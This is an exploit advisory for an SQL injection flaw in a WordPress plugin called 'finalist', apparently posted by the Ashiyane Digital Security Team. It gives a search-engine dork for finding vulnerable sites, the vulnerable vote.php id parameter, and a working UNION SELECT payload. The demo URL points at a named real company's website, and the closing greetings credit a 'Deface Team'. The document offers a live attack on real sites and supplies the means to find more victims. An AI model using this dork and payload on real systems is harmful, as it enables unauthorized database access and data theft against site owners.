++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++ ++++++++++++++++ # Exploit Title: wordpress finalist plugins SQL injection Vulnerability # # # Exploit Author: Ashiyane Digital Security Team# # # Home : www.Ashiyane.org# # # Vendor Homepage: www.thefaceshop.com.sg# # # Software Link: www.wordpress.com# # # Tested on: Windows 7# # # Dork: inurl:"wp-content/plugins/finalist"# # ============================================================= #Location:site/wp-content/plugins/finalist/vote.php?id=[SQL] # # #DEm0:http://www.thefaceshop.com.sg/wp-content/plugins/finalist/vote.php?id=131+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- # # ++++++++++++++++++++++++++++++++++ ====================================== * Greetz to: My Lord Allah * Sp Tnx To: Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,am118,PrinceofHacking,Alireza66,Amirh03in,B4b4K KH4TaR,sil3nt and all Ashiyane Security [ Researcher Team AND Deface Team ] * The Last One : My Self, tr0janman ******* --------------------------------------------